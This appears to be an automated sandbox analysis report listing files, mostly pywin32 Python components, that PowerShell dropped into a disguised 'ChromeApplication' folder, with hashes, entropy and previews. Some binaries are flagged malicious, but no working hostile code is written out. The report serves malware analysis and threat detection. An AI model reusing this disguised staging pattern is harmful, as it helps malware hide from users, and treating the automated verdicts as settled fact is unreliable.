                                                                                                                                                                                                  SHA-512:FAE02DDAB39E207087ED89FEF50ECA368DEBB22D2EAC6D4268AC1F53C6D64C3E516CDB4A23FDC1649860C2EDCCEC44DEDED84A2F0BE7A7FC5C7EC1501FE60F2F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C. .".s.".s.".s.ZKs.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".spK.r.".s.I.r.".s.".sP".s.W.r.".s.W.r.".s.W.r.".sRich.".s................PE..L......d...........!.....L...6.......M.......`............................................@......................... r..H...hr..........L.......................L...4l..T............................l..@............`..<............................text...+K.......L.................. ..`.rdata.......`... ...P..............@..@.data...l............p..............@....rsrc...L............x..............@..@.reloc..L............|..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmon.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23040
                                                                                                                                                                                                  Entropy (8bit):5.7004102661011204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ni14OW/KNbivlL7p95MlMHMyM60QYMuVGSLNpuKMjwaahTO3KBQ77d1qGQCilGN:COKNAlL7VMlMHMyM60QYMu8SZpuiRVey
                                                                                                                                                                                                  MD5:1DBE59165907DA9B1EB6CFD713D12B00
                                                                                                                                                                                                  SHA1:7EDD94FFCB589CB68D33125ADC3AF3F7A0D82C41
                                                                                                                                                                                                  SHA-256:E0E5897DC50BBF76DD32730216992FF402A799ED0FF8DF338F6CDF59C385348B
                                                                                                                                                                                                  SHA-512:B135532F44B4E1F945BD24ABE559A120CE37F06BB75300540C852D71BC22F214323C2B96E103C5C862F8E396C1933A4150A06BF3B33EBD8F295C600EBDE81F44
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R"K..C%_.C%_.C%_.;._.C%_D6$^.C%_.($^.C%_D6 ^.C%_D6!^.C%_D6&^.C%_.6$^.C%_.*$^.C%_.C$_RC%_.6,^.C%_.6%^.C%_.6'^.C%_Rich.C%_........................PE..L......d...........!.........(......v*.......@............................................@..........................M..P...@N.......p..T.......................(....G..T...........................`G..@............@..,............................text...3,.......................... ..`.rdata..d....@.......2..............@..@.data...t....`.......J..............@....rsrc...T....p.......P..............@..@.reloc..(............T..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmondata.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):5.519899099469349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6V8rwsZ9DOOAXldyxfF6jdeq75G3hOO/pOFK9:6VZvldyHS74PhO49
                                                                                                                                                                                                  MD5:08B864ADB87687152CD57999ABD5FE1A
                                                                                                                                                                                                  SHA1:3F3EF6CBEDC9E8E22ECF573F3D00DB889C61FA0D
                                                                                                                                                                                                  SHA-256:D49156080F394B23CC595AB6630125A20BAF16F2B8904B3133987D4F3F18B9DC
                                                                                                                                                                                                  SHA-512:6119F3A3CCCEF5921376665007C37893023D896DEEF09C98BD76EC44E1588A51F8A953126F0163669F71F46EC6C8CF484A427EC1BC0BF08F73656898D7880E4E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yt.T=...=...=...4m..9...o`..?...o`..7...o`..7...o`..<...)~..8...=........`..<....`..<....`|.<....`..<...Rich=...................PE..L......d...........!................k .......0...............................p............@.........................@7.......7..x....P..,....................`......02..T............................2..@............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....rsrc...,....P.......2..............@..@.reloc.......`.......<..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\pythonservice.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17408
                                                                                                                                                                                                  Entropy (8bit):5.441828005763723
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XeJOXLVXp5ftMPeG6pPjf374xkLn2JxbRqDNIhl:Xe8X/BtMWG6pz37eYSFRqDNIh
                                                                                                                                                                                                  MD5:78F6F257CF3AA97F4261749A37968A5F
                                                                                                                                                                                                  SHA1:7A6F6DB50ECB6EA66DF5A12EBF282682EC634453
                                                                                                                                                                                                  SHA-256:E753C57CC2F31A888BAF162EB9B28C771BDFABFCE5AB977969EE7D957DD5270B
                                                                                                                                                                                                  SHA-512:A0A177AE9E98C6FA5C95666D2359E29107EAFBB12483B073CBFF1E42854A979E42D8B49780F536B906D15AF83809780B0C805B11A4D0CB0BE5A704B75BC184C5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.....\...\...\.rj\...\...]...\...]...\...]...\...]...\...]...\.c.]...\.a.]...\...\...\...]...\...\...\...]...\Rich...\........................PE..L...,..d....................."...............0....@.......................................@..................................9.......`.......................p..L....4..T...........................P5..@............0...............................text...3........................... ..`.rdata..8....0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..L....p.......@..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\ControlService.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18043
                                                                                                                                                                                                  Entropy (8bit):4.297873544548919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:iCQsViutcVu/s7ncf1wqad7fOXuH+nUpTr4:iC7GcTad7fOXuH+nM4
                                                                                                                                                                                                  MD5:4FC327FDD744665C26F3E21B58E3D385
                                                                                                                                                                                                  SHA1:C1B6060579286A5695870769547244211DE35794
                                                                                                                                                                                                  SHA-256:511A0E1F785C7643E8FF535245A3F0710005F161A5428D522E352D760C102393
                                                                                                                                                                                                  SHA-512:13AFDE4113282AF90B53D1E597749777F3B3FA6C9BB268B80398D5B878AA41D9B44D31E2D310E24CCA025A919E707B37E41F5EE6611D327C9522B680DD3F89C6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ControlService.py.#.# A simple app which duplicates some of the functionality in the.# Services applet of the control panel..#.# Suggested enhancements (in no particular order):.#.# 1. When changing the service status, continue to query the status.# of the service until the status change is complete. Use this.# information to put up some kind of a progress dialog like the CP.# applet does. Unlike the CP, allow canceling out in the event that.# the status change hangs..# 2. When starting or stopping a service with dependencies, alert.# the user about the dependent services, then start (or stop) all.# dependent services as appropriate..# 3. Allow toggling between service view and device view.# 4. Allow configuration of other service parameters such as startup.# name and password..# 5. Allow connection to remote SCMs. This is just a matter of.# reconnecting to the SCM on the remote machine; the rest of the.# code should still work the same..# 6. Either implement the startup parameter

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\VersionStamp\BrandProject.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2789
                                                                                                                                                                                                  Entropy (8bit):4.683118967004213
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:CUAgR5xR8uwd8pI8Q5IqnA3aze4v2EaXBbKzaIOZ4KKi5XMK7c:CVgRp8uwd8pI8QSh3aze4v2EaxbKPOZS
                                                                                                                                                                                                  MD5:A84154C766E7562DA3A8FBA7352394A5
                                                                                                                                                                                                  SHA1:2F865533CE526A05C840CF3AE13A24364F9763BE
                                                                                                                                                                                                  SHA-256:2851E3C6A67762E73A406A95EC6BFC0C8326D4F6C24271CD089853368A86518A
                                                                                                                                                                                                  SHA-512:AA3323C9D3004AF8F51EC20EAFCB61CA41701B49845CDDA40D2C753D35980DB77243DCF15DACE8B63750D083DED600CACB659FC64BFF38A9035F4BB07AC7AEAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# BrandProject.py.#.# Brand a VSS project with a "build number", then optionally.# stamp DLL/EXE files with version information...import os.import string.import sys..import bulkstamp.import vssutil.import win32api...def BrandProject(. vssProjectName,. descFile,. stampPath,. filesToSubstitute,. buildDesc=None,. auto=0,. bRebrand=0,.):. # vssProjectName -- The name of the VSS project to brand.. # descFile -- A test file containing descriptions of the files in the release.. # stampPath -- The full path to where the files referenced in descFile can be found.. path = win32api.GetFullPathName(stampPath).. build = vssutil.MakeNewBuildNo(vssProjectName, buildDesc, auto, bRebrand). if build is None:. print("Cancelled"). return.. bulkstamp.scan(build, stampPath, descFile). for infile, outfile in filesToSubstitute:. SubstituteVSSInFile(vssProjectName, infile, outfile). return 1...def usage(msg):. print(msg). print(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\VersionStamp\bulkstamp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4207
                                                                                                                                                                                                  Entropy (8bit):4.3918564406115115
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JJUsZxWPFVUfLIwJg+0L+0fy94bB1G+x3qafWWlxx84V1Hzvqs:JJVxWDUBJR0L+B4jGZafWWrx3Hzvqs
                                                                                                                                                                                                  MD5:3DAF8F9FB9BE8BBE4AF313F518CECDEF
                                                                                                                                                                                                  SHA1:743AFB529F2798F0CF774FB451BF8BFD83AC261A
                                                                                                                                                                                                  SHA-256:76A2C2F847AF7D90ABA65C5F39306E23551F52F2FB7686CF45AB3F4E6C96F635
                                                                                                                                                                                                  SHA-512:DBAAED775B3F922A2F2B09EC57DABC8D0F3C8E8DC66317407D882550C58F077720F05AECDCDBAE9A2FA997CCE733A84D7B9F880C64F2791E58C5A8BED31BDD9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# bulkstamp.py:.# Stamp versions on all files that can be found in a given tree..#.# USAGE: python bulkstamp.py <version> <root directory> <descriptions>.#.# Example: python bulkstamp.py 103 ..\win32\Build\ desc.txt.#.# <version> corresponds to the build number. It will be concatenated with.# the major and minor version numbers found in the description file..#.# Description information is pulled from an input text file with lines of.# the form:.#.# <basename> <white space> <description>.#.# For example:.#.# PyWinTypes.dll Common types for Python on Win32.# etc.#.# The product's name, major, and minor versions are specified as:.#.# name <white space> <value>.# major <white space> <value>.# minor <white space> <value>.#.# The tags are case-sensitive..#.# Any line beginning with "#" will be ignored. Empty lines are okay..#..import fnmatch.import os.import sys..import verstamp.import win32api..numStamped = 0..g_patterns = [. "*.dll",. "*.pyd",. "*.exe",.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\VersionStamp\vssutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5690
                                                                                                                                                                                                  Entropy (8bit):4.631936788839383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:i7w5LSUoVs8wS87n/R2QXfPAEdr3wUsUt2DUxY2dcXTl3UVTRgtjkzFidMl0+xK3:IUobwSan/R2QxdhpxVqXREVTeqc+xaB
                                                                                                                                                                                                  MD5:CAEB3C147B18ED16091C79BED0124013
                                                                                                                                                                                                  SHA1:AF38CCF2C2D6B612BB236A741349BAEC414553F1
                                                                                                                                                                                                  SHA-256:29D4CAC8631D01D1ABFDFDF26B8DEE88EF22EBEF484C50238BCAC8DF1FEAD2CC
                                                                                                                                                                                                  SHA-512:1C4BA38FBCA369E1E1375C250FD619C45895AB06ED9417053A8CAC5059176F54C126BC61AF7F3D3A3B100FBAA7B5862F307B475F7F184DD960092B3D5A414D7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import string.import time.import traceback..import pythoncom.import win32com.client.import win32com.client.gencache.import win32con..constants = win32com.client.constants..win32com.client.gencache.EnsureModule("{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}", 0, 5, 0)..error = "vssutil error"...def GetSS():. ss = win32com.client.Dispatch("SourceSafe"). # SS seems a bit weird. It defaults the arguments as empty strings, but. # then complains when they are used - so we pass "Missing". ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing). return ss...def test(projectName):. ss = GetSS(). project = ss.VSSItem(projectName).. for item in project.GetVersions(constants.VSSFLAG_RECURSYES):. print(item.VSSItem.Name, item.VersionNumber, item.Action)...# .item=i.Versions[0].VSSItem.# .for h in i.Versions:.# ..print `h.Comment`, h.Action, h.VSSItem.Name...def SubstituteInString(inString, evalEnv):. substChar = "$". fields = string.split(inString, substChar)

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\backupEventLog.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1268
                                                                                                                                                                                                  Entropy (8bit):4.508504303752949
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8FWqM5oI3Zqiiko/B/cdyXKe1KLEnK4mnR3YvUN84+JApAtGh:Tq4oI3YuSVW7e1K4lmnRpN8JJAuM
                                                                                                                                                                                                  MD5:3DE21CB285822AB13A643A67AE18808E
                                                                                                                                                                                                  SHA1:70EAD65A85909EDAD23FA14EA2A6FBAF4F798BA1
                                                                                                                                                                                                  SHA-256:9AFCB5B2D0C07224554E5A1B2DD0954092A09AE1B30824376CBD29CEA44340E4
                                                                                                                                                                                                  SHA-512:50EF3A5013DB970DAAE33AA57A752F6036CEC7B99012E9436C8E5A1517BE5A676EF820CDDFA80DC22C9ABA7451739AE96039E7A0A534BA173BAC24CC9F7C7FB6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generate a base file name.import os.import time..import win32api.import win32evtlog...def BackupClearLog(logType):. datePrefix = time.strftime("%Y%m%d", time.localtime(time.time())). fileExists = 1. retry = 0. while fileExists:. if retry == 0:. index = "". else:. index = "-%d" % retry. try:. fname = os.path.join(. win32api.GetTempPath(),. "%s%s-%s" % (datePrefix, index, logType) + ".evt",. ). os.stat(fname). except os.error:. fileExists = 0. retry = retry + 1. # OK - have unique file name.. try:. hlog = win32evtlog.OpenEventLog(None, logType). except win32evtlogutil.error as details:. print("Could not open the event log", details). return. try:. if win32evtlog.GetNumberOfEventLogRecords(hlog) == 0:. print("No records in event log %s - not backed up" % logType). return. win32e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\ce\pysynch.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8273
                                                                                                                                                                                                  Entropy (8bit):4.506389676116937
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:jb+gnqVXwnUVqIAbmz/BiN0ldUGCIp7BwVy1Hu/3w8Ed6ZJvQPsrQyKrztxPbHAT:2oaS0zT0fEd62ZhsqdSxmS+S+vUHkHi
                                                                                                                                                                                                  MD5:8AE8F1287D1CA8C90E8041E451510529
                                                                                                                                                                                                  SHA1:A345CF8CD0F4D2D102F1312E99EA12161EBE3709
                                                                                                                                                                                                  SHA-256:36F8729DBF8A7B648F4392875EF310DD1EC6F670F51219DD7876C67C941F0509
                                                                                                                                                                                                  SHA-512:215573442BCEB635CF5EECBA1912EECE075CD849125446E58DAC8443A264FC13C5374F99F1C7C83CA42839E8A7202B34B6591AD825757378917A67453914ACB3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Simple CE synchronisation utility with Python features...import fnmatch.import getopt.import os.import string.import sys..import win32api.import win32con.import win32file.import wincerapi...class InvalidUsage(Exception):. pass...def print_error(api_exc, msg):. hr, fn, errmsg = api_exc. print("%s - %s(%d)" % (msg, errmsg, hr))...def GetFileAttributes(file, local=1):. if local:. return win32api.GetFileAttributes(file). else:. return wincerapi.CeGetFileAttributes(file)...def FindFiles(spec, local=1):. if local:. return win32api.FindFiles(spec). else:. return wincerapi.CeFindFiles(spec)...def isdir(name, local=1):. try:. attr = GetFileAttributes(name, local). return attr & win32con.FILE_ATTRIBUTE_DIRECTORY. except win32api.error:. return 0...def CopyFileToCe(src_name, dest_name, progress=None):. sh = win32file.CreateFile(. src_name, win32con.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None. ).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\killProcName.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1994
                                                                                                                                                                                                  Entropy (8bit):4.626371651169389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ZIaltbtF61tB8UbtsTIgP70kWkHDHbJTJngTlM0yvVDb6kXi4GdUe:5DFqmssEgP7TbbJTJH0gfTXi4Pe
                                                                                                                                                                                                  MD5:CF3D42D61D5ABEA7E4F7AC5279237F75
                                                                                                                                                                                                  SHA1:670323D1F0651A3800E503E058D6734A7683FA2B
                                                                                                                                                                                                  SHA-256:DAC26F4040B87A3D9E8A49EE4A08696A280EBC9710E39B98C576B7E322002DF8
                                                                                                                                                                                                  SHA-512:5F655E0A28FFC6FD73628F7A9068875CACBBF66193CDE7C3CEB162164BACD152C5CB9DD8A777550312A95F4EB984933CDA8B9B49CBAAFACAEADAB725C9DC2721
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Kills a process by process name.#.# Uses the Performance Data Helper to locate the PID, then kills it..# Will only kill the process if there is only one process of that name.# (eg, attempting to kill "Python.exe" will only work if there is only.# one Python.exe running. (Note that the current process does not.# count - ie, if Python.exe is hosting this script, you can still kill.# another Python.exe (as long as there is only one other Python.exe)..# Really just a demo for the win32pdh(util) module, which allows you.# to get all sorts of information about a running process and many.# other aspects of your system...import sys..import win32api.import win32con.import win32pdhutil...def killProcName(procname):. # Change suggested by Dan Knierim, who found that this performed a. # "refresh", allowing us to kill processes created since this was run. # for the first time.. try:. win32pdhutil.GetPerformanceAttributes("Process", "ID Process", procname). except:. p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\rasutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2722
                                                                                                                                                                                                  Entropy (8bit):4.5589989171602765
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:XdgqmyiL1X69f0+FaGtOJ/kpZAbAKSck7/zir0/PNX/hJyJPrdby8pFdfeg79yGT:XdgqZiL1K9xFnprAbA8k7/zt/VX/hqrF
                                                                                                                                                                                                  MD5:11B0D54C2FF5F7A09F058B2F0007E51C
                                                                                                                                                                                                  SHA1:5B7DBCC531E668CED8A64E77E8B3ECAEA74F1EFF
                                                                                                                                                                                                  SHA-256:CC4BD24331F177797371A0F6F725F8D370A544B95C9C1471B9CE52D9C7A0BF0D
                                                                                                                                                                                                  SHA-512:78829C0E9851BC8D6D44C212BDABE4FD72652EA00F3DE784B8DA8813DD09820D7F6ECB9F1187DB3F11CDF625BF0888A2056978CD0F76CA820852D5B1FEF28F2B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of using the RAS API from Python.import sys..import win32ras...# The error raised if we can not.class ConnectionError(Exception):. pass...def Connect(rasEntryName, numRetries=5):. """Make a connection to the specified RAS entry... Returns a tuple of (bool, handle) on success.. - bool is 1 if a new connection was established, or 0 is a connection already existed.. - handle is a RAS HANDLE that can be passed to Disconnect() to end the connection... Raises a ConnectionError if the connection could not be established.. """. assert numRetries > 0. for info in win32ras.EnumConnections():. if info[1].lower() == rasEntryName.lower():. print("Already connected to", rasEntryName). return 0, info[0].. dial_params, have_pw = win32ras.GetEntryDialParams(None, rasEntryName). if not have_pw:. print("Error: The password is not saved for this connection"). print(. "Please connect manually selecting the 'save

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\regsetup.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20460
                                                                                                                                                                                                  Entropy (8bit):4.586626567064987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fJoTy/B6H8DfSp6KH3O0mV35PPWjvVWC3qxRS:fJoTyJ6HgKXO0U5PPWhqS
                                                                                                                                                                                                  MD5:D7E5CFFE47C88CA037338FD94EA1AF5B
                                                                                                                                                                                                  SHA1:CD59B2438108227FA97263805B7C4E7D9956B1A5
                                                                                                                                                                                                  SHA-256:8A54BCF838F37CB1F49074DC2254AF3EA57926C2ACCD8C5CF201F9C554BD186E
                                                                                                                                                                                                  SHA-512:60D03ACE715A73DA2B695BF1B8448A52488D82FDB79CAB48FB4591717C0AD107AA68545B9C240A750728E6BD7FA258BE4C70C1C764EF5CC2FEE425814319676A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A tool to setup the Python registry....class error(Exception):. pass...import sys # at least we can count on this!...def FileExists(fname):. """Check if a file exists. Returns true or false.""". import os.. try:. os.stat(fname). return 1. except os.error as details:. return 0...def IsPackageDir(path, packageName, knownFileName):. """Given a path, a ni package name, and possibly a known file name in. the root of the package, see if this path is good.. """. import os.. if knownFileName is None:. knownFileName = ".". return FileExists(os.path.join(os.path.join(path, packageName), knownFileName))...def IsDebug():. """Return "_d" if we're running a debug version... This is to be used within DLL names when locating them.. """. import importlib.machinery.. return "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else ""...def FindPackagePath(packageName, knownFileName, searchPaths):. """Find a package.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\scripts\setup_d.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                  Entropy (8bit):4.703409335080606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:zz6vYYgifc7r7hVqHUYq6xU9LoJSvkzzgxRqI+ikT8J:zzpT7nhVqjlxU16hzgLqZjT8J
                                                                                                                                                                                                  MD5:4F4E28EE25DADE82161FD7FF394CB7B6
                                                                                                                                                                                                  SHA1:C37C8B0D10E0C757D1CD44AD1C718C69935416D6
                                                                                                                                                                                                  SHA-256:1C286DCFADB16AAEEB70F5D0CB0BCAE51084B00E58228896E1B0FA942A7A5098
                                                                                                                                                                                                  SHA-512:F624877D4C8A1CBCAB71FB548071CD06B0C835E4B9B4310540111649B71810AD3F1D56F15A4A54816B91093D6D883D0154C59119172092BF95057A5D2A019CD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Install and register pythonxx_d.dll, pywintypesxx_d.dll and pythoncomxx_d.dll.#.# Assumes the _d files can be found in the same directory as this script.# or in the cwd...import os.import shutil.import sys.import winreg..import win32api...def usage_and_die(rc):. print(). print("This script is designed to copy and register the Python debug"). print("binaries. It looks for pythonxx_d.dll, pythoncomxx_d.dll etc,"). print("and installs them to work correctly with Python debug builds."). print(). print("You will generally find this script in the. zip file that"). print("included these _d files. Please run this script from"). print("that directory"). sys.exit(rc)...if win32api.__file__.find("_d") > 0:. print("This scripts appears to be running a DEBUG version of Python."). print("Please run it using a normal release build (python.exe)"). usage_and_die(1)..try:. import pythoncom.except ImportError as details:. print("Could not import the release v

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\servicemanager.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                  Entropy (8bit):5.766904899896164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Eus9dTayzceMuRh+0RSRpnR5OXtbvjXObm2PI:k9dD5RHcRpR4tbbXObXPI
                                                                                                                                                                                                  MD5:DD419E9F89E8A2815858A8B6D059C027
                                                                                                                                                                                                  SHA1:1158C7CD0A7A1298F8DCE6B651814112CCC1456E
                                                                                                                                                                                                  SHA-256:CABDFF87D5A1118F16DB1672DEC81394183DC9D644CF98EEFD992F62000BCE83
                                                                                                                                                                                                  SHA-512:ADC9D15D3FE7E80E65E2E1D8C026B6CB561A79182F10543A01E91DE33ED36944954BA0458C2FF5115B99AAB1C104E3ADB929184E0A380F3A697A7E5775DD40ED
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T_..51..51..51..M...51.@0..51.@4..51.@5..51.@2..51..@0..51.x\0..51..^0..51..50..51..@8..51..@1..51..@...51..@3..51.Rich.51.........................PE..L...I..d...........!.....<...F......';.......P............................................@.........................pc..`....d..........x.......................t....\..T...........................`\..@............P.. ............................text...z:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....rsrc...x............j..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\test\handles.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5471
                                                                                                                                                                                                  Entropy (8bit):4.483065386918216
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kC/Zakzv+Hjce4Dr+fYH+M5+PX2cYU/Bi0EBdktW2E9mIq:kNiFxUZcBdktVqq
                                                                                                                                                                                                  MD5:9A0B2387B2891F63CAE03C9E2DDC3322
                                                                                                                                                                                                  SHA1:963FBED7627CFE59C4223211D3CE115FD0E77849
                                                                                                                                                                                                  SHA-256:9A39FCE6B220CC16C66E8C3F0CF599CA8662F2E4EAA3C9B97192417E133C0FBB
                                                                                                                                                                                                  SHA-512:CF19F968B5E04B9643EA308A42B624CC5631809440432B4F8C116A648792F4364805DDE07BB5CE271EE0DEDF131A60636FB6A87F9E4C12861F0E85CA407DB478
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys.import unittest..import pywintypes.import win32api...# A class that will never die vie refcounting, but will die via GC..class Cycle:. def __init__(self, handle):. self.cycle = self. self.handle = handle...class PyHandleTestCase(unittest.TestCase):. def testCleanup1(self):. # We used to clobber all outstanding exceptions.. def f1(invalidate):. import win32event.. h = win32event.CreateEvent(None, 0, 0, None). if invalidate:. win32api.CloseHandle(int(h)). 1 / 0. # If we invalidated, then the object destruction code will attempt. # to close an invalid handle. We don't wan't an exception in. # this case.. def f2(invalidate):. """This function should throw an IOError.""". try:. f1(invalidate). except ZeroDivisionError as exc:. raise IOError("raise 2").. self.assertRaises(IOError,

